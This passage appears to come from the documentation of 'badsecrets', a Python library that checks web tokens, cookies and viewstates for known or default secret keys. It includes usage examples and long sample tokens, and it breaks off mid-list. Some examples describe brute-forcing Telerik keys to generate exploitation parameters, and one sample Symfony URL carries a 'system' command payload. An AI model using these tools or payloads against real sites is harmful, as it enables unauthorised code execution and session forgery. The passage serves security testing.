Fully functional CLI example for identifying known Telerik Hash keys and Encryption keys for Post-2017 versions (those patched for CVE-2017-9248), and brute-forcing version / generating exploitation DialogParameters values.
python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
Optionally include ASP.NET MachineKeys with --machine-keys (Will SIGNIFICANTLY increase brute-forcing time)
Brute-force detection of Symfony known secret key when "_fragment" URLs are enabled, even when no example URL containing a hash can be located. Relevant blog post.
python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/
One of the best ways to use Badsecrets, especially for the `ASPNET_Viewstate` and `Jsf_viewstate` modules, is with the Badsecrets BBOT module. This will allow you to easily check across thousands of systems in conjunction with subdomain enumeration.
bbot -f subdomain-enum -m badsecrets -t evil.corp
See if a token or other cryptographic product was produced with a known key
from badsecrets import modules_loaded
Django_SignedCookies = modules_loaded["django_signedcookies"]
ASPNET_Viewstate = modules_loaded["aspnet_viewstate"]
Flask_SignedCookies = modules_loaded["flask_signedcookies"]
Peoplesoft_PSToken = modules_loaded["peoplesoft_pstoken"]
Telerik_HashKey = modules_loaded["telerik_hashkey"]
Telerik_EncryptionKey = modules_loaded["telerik_encryptionkey"]
Rails_SecretKeyBase = modules_loaded["rails_secretkeybase"]
Generic_JWT = modules_loaded["generic_jwt"]
Jsf_viewstate = modules_loaded["jsf_viewstate"]
Symfony_SignedURL = modules_loaded["symfony_signedurl"]
Express_SignedCookies = modules_loaded["express_signedcookies"]
Laravel_SignedCookies = modules_loaded["laravel_signedcookies"]
x = ASPNET_Viewstate()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("AgF5WuyVO11CsYJ1K5rjyuLXqUGCITSOapG1cYNiriYQ6VTKochMpn8ws4eJRvft81nQIA==","EDD8C9AE")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Telerik_HashKey()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("vpwClvnLODIx9te2vO%2F4e06KzbKkjtwmNnMx09D1Dmau0dPliYzgpqB9MnEqhPNe3fWemQyH25eLULJi8KiYHXeHvjfS1TZAL2o5Gku1gJbLuqusRXZQYTNlU2Aq4twXO0o0CgVUTfknU89iw0ceyaKjSteOhxGvaE3VEDfiKDd8%2B9j9vD3qso0mLMqn%2Btxirc%2FkIq5oBbzOCgMrJjkaPMa2SJpc5QI2amffBJ%2BsAN25VH%2BwabEJXrjRy%2B8NlYCoUQQKrI%2BEzRSdBsiMOxQTD4vz2TCjSKrK5JEeFMTyE7J39MhXFG38Bq%2FZMDO%2FETHHdsBtTTkqzJ2odVArcOzrce3Kt2%2FqgTUPW%2BCjFtkSNmh%2FzlB9BhbxB1kJt1NkNsjywvP9j7PvNoOBJsa8OwpEyrPTT3Gm%2BfhDwtjvwpvN7l7oIfbcERGExAFrAMENOOt4WGlYhF%2F8c9NcDv0Bv3YJrJoGq0rRurXSh9kcwum9nB%2FGWcjPikqTDm6p3Z48hEnQCVuJNkwJwIKEsYxJqCL95IEdX3PzR81zf36uXPlEa3YdeAgM1RD8YGlwlIXnrLhvMbRvQW0W9eoPzE%2FjP68JGUIZc1TwTQusIWjnuVubFTEUMDLfDNk12tMwM9mfnwT8lWFTMjv9pF70W5OtO7gVN%2BOmCxqAuQmScRVExNds%2FF%2FPli4oxRKfgI7FhAaC%2Fu1DopZ6vvBdUq1pBQE66fQ9SnxRTmIClCpULUhNO90ULTpUi9ga2UtBCTzI8z6Sb6qyQ52NopNZMFdrn9orzdP8 oqFeyYpF%2BQEtbp%2F5AMENkFkWUxHZn8NoSlO8P6G6ubSyDdY4QJPaFS4FxNhhm85WlZC9xfEZ1AGSSBOu9JJVYiKxXnL1yYLqrlWp5mfBHZeUBwEa%2FMjGxZEVYDhXo4PiU0jxN7fYmjaobp3DSgA5H3BcFuNG5d8CUnOlQcEie5b%2BUHOpI9zAk7qcuEUXbaZ5Mvh0t2jXCRALRKYDyBdbHlWAFo10dTIM6L3aSTM5uEz9%2FalXLXoWlMo7dTDpuO5bBfTq7YkoPExL3g3JJX47UhuLq85i3%2Bzxfvd7r%2Fmid69kbD3PnX%2Bj0QxaiShhyOZg6jl1HMeRRXvZap3FPCIfxbCf7j2TRqB5gYefBIIdGYjrdiL6HS8SbjXcROMwh2Fxnt505X4jmkmDcGmneU3z%2B84TSSFewcSpxGEGvHVkkU4OaT6vyFwsxCmdrR187tQZ7gn3ZkAiTps%2FfOPcL5QWXja06Z%2FHT3zboq6Hj9v9NBHzpC1eAK0YN8r4V2UMI3P0%2FsIPQYXhovoeLjJwq6snKZTX37ulE1mbS1uOY%2BZrvFYbLN5DdNL%2B%2Bl%2F%2BcWIpc0RSYBLo19xHpKeoeLjU2sxaYzK%2B92D4zKANdPPvsHPqJD1Y%2FBwCL%2FfZKaJfRK9Bj09ez1Z1ixTEKjIRCwuxijnJGq33faZchbwpMPpTfv43jEriGwXwoqOo9Mbj9ggPAil7O81XZxNT4vv4RoxXTN93V100rt3ClXauL%2BlNID%2BseN2CEZZqnygpTDf2an%2FVsmJGJJcc0goW3l43mhx2U79zeuT94cFPGpvITEbMtjmuNsUbOBuw6nqm5rAs%2FxjIsDRqfQxGQWfS0kuwuU6RRmiME2Ps0NrBENIbZzcbgw6%2BRIwClWkvEG%2BK%2FPdcAdfmRkAPWUNadxnhjeU2jNnzI1yYNIOhziUBPxgFEcAT45E7rWvf8gh T08HZvphzytPmD%2FxuvJaDdRgb6a30TjSpa7i%2BEHkIMxM5eH1kiwhN6xkTcBsJ87epGdFRWKhTGKYwCbaYid1nRs7%2BvQEU7MRYghok8KMTueELipohm3otuKo8V4a7w4TgTSBvPE%2BLPLJRwhM8KcjGlcpzF1NowRo6zeJJhbdPpouUH2NJzDcp7P4uUuUB9Cxt9B986My6zDnz1eyBvRMzj7TABfmfPFPoY3RfzBUzDm%2FA9lOGsM6d9WZj2CH0WxqiLDGmP1Ts9DWX%2FsYyqEGK5R1Xpnp7kRIarPtYliecp50ZIH6nqSkoCBllMCCE6JN%2BdoXobTpulALdmQV0%2Bppv%2FAjzIJrTHgX7jwRGEAeRgAxTomtemmIaH5NtV7xt8XS%2BqwghdJl1D06%2FWhpMtJ1%2FoQGoJ0%2F7ChYyefyAfsiQNWsO66UNVyl71RVPwATnbRO5K5mtxn0M2wuXXpAARNh6pQTcVX%2FTJ4jmosyKwhI6I870NEOsSaWlKVyOdb97C3Bt0pvzq8BagV5FMsNtJKmqIIM0HRkMkalIyfow9iS%2B5xGN5eKM8NE4E6hO4CvmpG%2BH2xFHTSNzloV0FjLdDmj5UfMjhUuEb3rkKK1bGAVaaherp6Ai6N4YJQzh%2FDdpo6al95EZN2OYolzxitgDgsWVGhMvddyQTwnRqRY04hdVJTwdhi4TiCPbLJ1Wcty2ozy6VDs4w77EOAQ5JnxUmDVPA3vXmADJZR0hIJEsuxXfYg%2BRIdV4fzGunV4%2B9jpiyM9G11iiesURK82o%2BdcG7FaCkkun2K2bvD6qGcL61uhoxNeLVpAxjrRjaEBrXsexZ9rExpMlFD8e3NM%2B0K0LQJvdEvpWYS5UTG9cAbNAzBs%3DpDsPXFGf2lEMcyGaK1ouARHUfqU0fzkeVwjXU9ORI%2Fs%3D")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Flask_SignedCookies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("eyJoZWxsbyI6IndvcmxkIn0.XDtqeQ.1qsBdjyRJLokwRzJdzXMVCSyRTA")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Peoplesoft_PSToken()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("qAAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AdQg4AC4AMQAwABSpxUdcNT67zqSLW1wY5/FHQd1U6mgAAAAFAFNkYXRhXHicHYfJDUBQAESfJY5O2iDWgwIsJxHcxdaApTvFGX8mefPmAVzHtizta2MSrCzsXBxsnOIt9yo6GvyekZqJmZaBPCUmVUMS2c9MjCmJKLSR/u+laUGuzwdaGw3o")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Django_SignedCookies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret(".eJxVjLsOAiEURP-F2hAuL8HSfr-BAPciq4ZNlt3K-O9KsoU2U8w5My8W4r7VsHdaw4zswoCdfrsU84PaAHiP7bbwvLRtnRMfCj9o59OC9Lwe7t9Bjb2OtbMkAEGQtQjekykmJy9JZIW-6CgUaCGsA6eSyV65s1Qya_xGKZrY-wPVYjdw:1ojOrE:bfOktjgLlUykwCIRIpvaTZRQMM3-UypscEN57ECtXis")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Rails_SecretKeyBase()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("dUEvRldLekFNcklGZ3ZSbU1XaHJ0ZGxsLzhYTHlNTW43T3BVN05kZXE3WUhQOVVKbVA3Rm5WaSs5eG5QQ1VIRVBzeDFNTnNpZ0xCM1FKbzFZTEJISzhaNzFmVGYzME0waDFURVpCYm5TQlJFRmRFclYzNUZhR3VuN29PMmlkVHBrRi8wb3AwZWgvWmxObkFOYnpkeHR1YWpWZ3lnN0Y4ZW9xSk9LNVlQd0U4MmFsbWtLZUI5VzkzRkM4YXBFWXBWLS15L00xME1nVFp2ZTlmUWcxZVlpelpnPT0=--7efe7919a5210cfd1ac4c6228e3ff82c0600d841")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Generic_JWT()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Telerik_EncryptionKey()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("owOnMokk%2F4N7IMo6gznRP56OYIT34dZ1Bh0KBbXlFgztgiNNEBYrgWRYDBkDlX8BIFYBcBztC3NMwoT%2FtNF%2Ff2nCsA37ORIgfBem1foENqumZvmcTpQuoiXXbMWW8oDjs270y6LDAmHhCRsl4Itox4NSBwDgMIOsoMhNrMigV7o7jlgU16L3ezISSmVqFektKmu9qATIXme63u4IKk9UL%2BGP%2Fk3NPv9MsTEVH1wMEf4MApH5KfWBX96TRIc9nlp3IE5BEWNMvI1Gd%2BWXbY5cSY%2Buey2mXQ%2BAFuXAernruJDm%2BxK8ZZ09TNsn5UREutvNtFRrePA8tz3r7p14yG756E0vrU7uBz5TQlTPNUeN3shdxlMK5Qzw1EqxRZmjhaRpMN0YZgmjIpzFgrTnT0%2Bo0f6keaL8Z9TY8vJN8%2BEUPoq%2F7AJiHKm1C8GNc3woVzs5mJKZxMUP398HwGTDv9KSwwkSpHeXFsZofbaWyG0WuNldHNzM%2FgyWMsnGxY6S086%2F477xEQkWdWG5UE%2FowesockebyTTEn3%2B%2FqiVy%2FIOxXvMpvrLel5nVY%2FSouHp5n2URRyRsfo%2B%2BOXJZo7yxKQoYBSSkmxdehJqKJmbgxNp5Ew8m89xAS5g99Hzzg382%2BxFp8yoDVZMOiTEuw0J%2B4G6KizqRW9cis%2FELd0aDE1V7TUuJnFrX%2BlCLOiv100tKpeJ0ePMOYrmvSn0wx7JhswNuj%2BgdKqvCnMSLakGWiOHxu5m9Qqdm3s5sk7nsaxMkh8IqV%2BSzB9A2K1kYEUlY40II1Wun67OSdLlYfdCFQk4ED0N%2BV4kES%2F1xpGiaPhxjboFiiV%2BkvCyJfkuotYuN%2B42CqF yAyepXPA%2BR5jVSThT6OIN2n1UahUnrD%2BwKKGMA9QpVPTSiGLen2KSnJtXISbrl2%2BA2AnQNH%2BMEwYVNjseM0%2BAosbgVfNde2ukMyugo%2FRfrRM27cbdVlE0ms0uXhlgKAYJ2ZN54w1tPWhpGxvZtB0keWpZan0YPh8CBgzsAIMa04HMYLCtgUTqxKqANoKXSy7VIJUzg3fl%2F2WUELjpXK9gRcgexNWDNB1E0rHd9PUo0PvpB4fxSrRpb1LRryipqsuoJ8mrpOVrVMvjracBvtoykK3GrN%2FDUlXkSG%2FAeBQN7HwDJ9QPi3AtEOohp78Op3nmbItXo7IJUSjzBNzUYR8YPj6Ud7Fje9LZSwMBngvgx%2BOKy6HsV4ofOAU2%2FK1%2BfxI0KkCeoSso9NJHWgBD7ijfXUa1Hrc%2FuNU3mTlSSVp3VStQrJbQCkr4paaHYWeeO4pRZCDSBNUzs9qq3TDePwpEQc4QROrw5htdniRk26lFIFm%2Fzk2nC77Pg%2BrkRC1W%2BlRv0lyXsmXVBCe8F1szpWXHCxHNAJwKH%2FBb%2BV1k6AXFXVWPW5vADbXUvRu0s6KLaqu6a0KCB7dt3K2Ni%2FI6O%2FmISYXzknbMrwwakNfajbRF2ibodgR9R9xvoCoCXa3ka7%2Fejr%2BmsZ2HvPKUAffd2fNIWCQrejfpuIoOWiYx6ufN8E41HetCbYfvsI6JQfPOEdOYWI2px%2BLdfO3Nybq99%2BRSQOhjNZakBP54ozlCUfwgpLOmTBwsswZexv1RK5MIi8%2FWtjlJ%2FKjkYxdkFUlwggGS2xDwzcyl2%2FakNCQ5YmxjU8cRY7jZQRMo%2F8uTw5qa2MNZPaQGI18uRgr0i%2FTX3t57fJYCpMLXSaUKIdO7O%2FCQhIyGTS6KrPN%2B3%2FgUb%2BPQ1viGhpnWfGEYF9vhIlK57z8G8G82UQ3DpttD7M 8mQ0KsmCOq75ECx9CWrWGk51vADlm%2BLEZ5oWjVMs%2FThki40B7tL7gzFrBuQksWXYeubMzZfFo4ZQ49di4wupHG5kRsyL2fJUzgpaLDP%2BSe6%2FjCnc52C7lZ3Ls0cHJVf9HRwDNXWM%2B4h8donNy5637QWK%2BV7mlH%2FL4xBZCfU9l6sIz%2FWHMtRaQprEem6a%2FRwPRDBiP65I2EwZLKGY8I%2F1uXJncwC8egLu82JY9maweI0VmJSmRcTf0evxqqe7vc9MqpsUlpSVNh4bFnxVIo5E4PGX70kVaTFe0vu1YdGKmFX5PLvkmWIf%2FnwfgPMqYsa0%2F09trboJ5LGDEQRXSBb7ldG%2FwLdOiqocYKAb91SMpn1fXVPBgkPM27QZxHnSAmWVbJR2%2FIhO%2BIVNzkgFAJlptiEPPPTxuBh%2BTT7CaIQE3oZbbJeQKvRkrt4bawTCOzciU%2F1zFGxubTJTSyInjQ8%2F1tVo7KjnxPKqGSfwZQN%2FeWL6R%2FpvCb%2BE6D4pdyczoJRUWsSNXNnA7QrdjgGNWhyOMiKvkDf3RD4mrXbul18WYVTsLyp0hvQsbdwBWOh7VlwfrWdy%2BklsttFi%2B%2BadKR7DbwjLTcxvdNpTx1WJhXROR8jwW26VEYSXPVqWnYvfyZo4DojKHMSDMbAakbuSJdkGP1d5w0AYbKlAcVQOqp9hbAvfwwLy4ErdIsOg0YEeCcnQVRAXwaCI9JvWWmM%2FzYJzE3X45A6lU9Pe7TAbft810MYh7lmV6Keb5HI6qXFiD%2B8khBZqi%2FsK6485k0a86aWLxOb4Eqnoc41x%2BYPv5CWfvP6cebsENo%3D%2BIUg0f64C4y77N4FZ6C82m5wMpvDQIHqx0ZFIHLhwMg%3D")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Jsf_viewstate()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("wHo0wmLu5ceItIi+I7XkEi1GAb4h12WZ894pA+Z4OH7bco2jXEy1RSCWwjtJcZNbWPcvPqL5zzfl03DoeMZfGGX7a9PSv+fUT8MAeKNouAGj1dZuO8srXt8xZIGg+wPCWWCzcX6IhWOtgWUwiXeSojCDTKXklsYt+kzlVbk5wOsXvb2lTJoO0Q==")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Symfony_SignedURL()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("https://localhost/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&_hash=Xnsvx/yLVQaimEd1CfepgH0rEXr422JnRSn/uaCE3gs=")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Express_SignedCookies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("s%3A8FnPwdeM9kdGTZlWvdaVtQ0S1BCOhY5G.qys7H2oGSLLdRsEq7sqh7btOohHsaRKqyjV4LiVnBvc")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Laravel_SignedCookies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("eyJpdiI6IlhlNTZ2UjZUQWZKVHdIcG9nZFkwcGc9PSIsInZhbHVlIjoiRlUvY2grU1F1b01lSXdveXJ0T3N1WGJqeVVmZlNRQjNVOWxiSzljL1Z3RDhqYUdDbjZxMU9oSThWRzExT0YvUmthVzVKRE9kL0RvTEw1cFRhQkphOGw4S2loV1ZrMkkwTHd4am9sZkJQd2VCZ3R0VlFSeFo3ay9wTlBMb3lLSG8iLCJtYWMiOiJkMmU3M2ExNDc2NTc5YjAwMGMwMTdkYTQ1NThkMjRkNTY2YTE4OTg2MzY5MzE5NGZmOTM4YWVjOGZmMWU4NTk2IiwidGFnIjoiIn0%3D")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
An additional layer of abstraction above `check_secret` is `carve`, which accepts a Python `requests.Response` object or a string.
import requests
from badsecrets import modules_loaded
Telerik_HashKey = modules_loaded["telerik_hashkey"]
x = Telerik_HashKey()
res = requests.get(f"http://example.com/")
r_list = x.carve(requests_response=res)
print(r_list)
telerik_dialogparameters_sample = """
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDialogOpener, {"_dialogDefinitions":{"ImageManager":{"SerializedParameters":"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","Width":"770px","Height":"588px","Title":"Image Manager"}
"""
r_list = x.carve(body=telerik_dialogparameters_sample)
print(r_list)
from badsecrets.base import check_all_modules
tests = [
"yJrdyJV6tkmHLII2uDq1Sl509UeDg9xGI4u3tb6dm9BQS4wD08KTkyXKST4PeQs00giqSA==",
"eyJoZWxsbyI6IndvcmxkIn0.XDtqeQ.1qsBdjyRJLokwRzJdzXMVCSyRTA",
"vpwClvnLODIx9te2vO%2F4e06KzbKkjtwmNnMx09D1Dmau0dPliYzgpqB9MnEqhPNe3fWemQyH25eLULJi8KiYHXeHvjfS1TZAL2o5Gku1gJbLuqusRXZQYTNlU2Aq4twXO0o0CgVUTfknU89iw0ceyaKjSteOhxGvaE3VEDfiKDd8%2B9j9vD3qso0mLMqn%2Btxirc%2FkIq5oBbzOCgMrJjkaPMa2SJpc5QI2amffBJ%2BsAN25VH%2BwabEJXrjRy%2B8NlYCoUQQKrI%2BEzRSdBsiMOxQTD4vz2TCjSKrK5JEeFMTyE7J39MhXFG38Bq%2FZMDO%2FETHHdsBtTTkqzJ2odVArcOzrce3Kt2%2FqgTUPW%2BCjFtkSNmh%2FzlB9BhbxB1kJt1NkNsjywvP9j7PvNoOBJsa8OwpEyrPTT3Gm%2BfhDwtjvwpvN7l7oIfbcERGExAFrAMENOOt4WGlYhF%2F8c9NcDv0Bv3YJrJoGq0rRurXSh9kcwum9nB%2FGWcjPikqTDm6p3Z48hEnQCVuJNkwJwIKEsYxJqCL95IEdX3PzR81zf36uXPlEa3YdeAgM1RD8YGlwlIXnrLhvMbRvQW0W9eoPzE%2FjP68JGUIZc1TwTQusIWjnuVubFTEUMDLfDNk12tMwM9mfnwT8lWFTMjv9pF70W5OtO7gVN%2BOmCxqAuQmScRVExNd s%2FF%2FPli4oxRKfgI7FhAaC%2Fu1DopZ6vvBdUq1pBQE66fQ9SnxRTmIClCpULUhNO90ULTpUi9ga2UtBCTzI8z6Sb6qyQ52NopNZMFdrn9orzdP8oqFeyYpF%2BQEtbp%2F5AMENkFkWUxHZn8NoSlO8P6G6ubSyDdY4QJPaFS4FxNhhm85WlZC9xfEZ1AGSSBOu9JJVYiKxXnL1yYLqrlWp5mfBHZeUBwEa%2FMjGxZEVYDhXo4PiU0jxN7fYmjaobp3DSgA5H3BcFuNG5d8CUnOlQcEie5b%2BUHOpI9zAk7qcuEUXbaZ5Mvh0t2jXCRALRKYDyBdbHlWAFo10dTIM6L3aSTM5uEz9%2FalXLXoWlMo7dTDpuO5bBfTq7YkoPExL3g3JJX47UhuLq85i3%2Bzxfvd7r%2Fmid69kbD3PnX%2Bj0QxaiShhyOZg6jl1HMeRRXvZap3FPCIfxbCf7j2TRqB5gYefBIIdGYjrdiL6HS8SbjXcROMwh2Fxnt505X4jmkmDcGmneU3z%2B84TSSFewcSpxGEGvHVkkU4OaT6vyFwsxCmdrR187tQZ7gn3ZkAiTps%2FfOPcL5QWXja06Z%2FHT3zboq6Hj9v9NBHzpC1eAK0YN8r4V2UMI3P0%2FsIPQYXhovoeLjJwq6snKZTX37ulE1mbS1uOY%2BZrvFYbLN5DdNL%2B%2Bl%2F%2BcWIpc0RSYBLo19xHpKeoeLjU2sxaYzK%2B92D4zKANdPPvsHPqJD1Y%2FBwCL%2FfZKaJfRK9Bj09ez1Z1ixTEKjIRCwuxijnJGq33faZchbwpMPpTfv43jEriGwXwoqOo9Mbj9ggPAil7O81XZxNT4vv4RoxXTN93V100rt3ClXauL%2BlNID%2BseN2CEZZqnygpTDf2an%2FVsmJGJJcc0goW3l43mhx2U79zeuT94cFPGpvITEbMtjmuNsUbOBuw6nqm5rAs%2FxjIsDRqfQ xGQWfS0kuwuU6RRmiME2Ps0NrBENIbZzcbgw6%2BRIwClWkvEG%2BK%2FPdcAdfmRkAPWUNadxnhjeU2jNnzI1yYNIOhziUBPxgFEcAT45E7rWvf8ghT08HZvphzytPmD%2FxuvJaDdRgb6a30TjSpa7i%2BEHkIMxM5eH1kiwhN6xkTcBsJ87epGdFRWKhTGKYwCbaYid1nRs7%2BvQEU7MRYghok8KMTueELipohm3otuKo8V4a7w4TgTSBvPE%2BLPLJRwhM8KcjGlcpzF1NowRo6zeJJhbdPpouUH2NJzDcp7P4uUuUB9Cxt9B986My6zDnz1eyBvRMzj7TABfmfPFPoY3RfzBUzDm%2FA9lOGsM6d9WZj2CH0WxqiLDGmP1Ts9DWX%2FsYyqEGK5R1Xpnp7kRIarPtYliecp50ZIH6nqSkoCBllMCCE6JN%2BdoXobTpulALdmQV0%2Bppv%2FAjzIJrTHgX7jwRGEAeRgAxTomtemmIaH5NtV7xt8XS%2BqwghdJl1D06%2FWhpMtJ1%2FoQGoJ0%2F7ChYyefyAfsiQNWsO66UNVyl71RVPwATnbRO5K5mtxn0M2wuXXpAARNh6pQTcVX%2FTJ4jmosyKwhI6I870NEOsSaWlKVyOdb97C3Bt0pvzq8BagV5FMsNtJKmqIIM0HRkMkalIyfow9iS%2B5xGN5eKM8NE4E6hO4CvmpG%2BH2xFHTSNzloV0FjLdDmj5UfMjhUuEb3rkKK1bGAVaaherp6Ai6N4YJQzh%2FDdpo6al95EZN2OYolzxitgDgsWVGhMvddyQTwnRqRY04hdVJTwdhi4TiCPbLJ1Wcty2ozy6VDs4w77EOAQ5JnxUmDVPA3vXmADJZR0hIJEsuxXfYg%2BRIdV4fzGunV4%2B9jpiyM9G11iiesURK82o%2BdcG7FaCkkun2K2bvD6qGcL61uhoxNeLVpAxjrRjaEBrXsexZ9rExpMlFD8e3 NM%2B0K0LQJvdEvpWYS5UTG9cAbNAzBs%3DpDsPXFGf2lEMcyGaK1ouARHUfqU0fzkeVwjXU9ORI%2Fs%3D",
